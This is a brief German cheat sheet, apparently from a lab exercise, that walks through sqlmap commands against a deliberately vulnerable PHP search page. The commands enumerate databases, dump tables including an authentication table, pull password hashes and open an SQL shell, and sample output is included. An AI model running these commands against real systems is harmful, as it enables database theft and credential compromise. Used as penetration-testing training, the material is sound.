Augabe aller Parameter und Optionen

• sqlmap -hh

Angriff und Auflisten der Datenbanken

• sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -dbs

Infos

[16:48:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[16:48:08] [INFO] fetching database names
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sql_injections

Auslesen der Tabellen der Datenbank

• sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections --tables

Auslesen der Passwort-Hashes aus der Datenbank

• sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --passwords
• Interaktiv kann man hier einen Dictionary-based Angriff starten

Dump der Datenbanktabellen

• sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections --dump

Struktur einer einzelnen Tabelle auslesen

• sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --columns -D sql_injections -T my_auth

Daten aus einer Tabelle auslesen

• sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --dump -D sql_injections -T my_auth

sql-Shell für Abfragen (SELECT-Query)

sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --sql-shell -D sql_injections

Aufruf des Wizards

• geführt und interaktiv
• sqlmap --wizard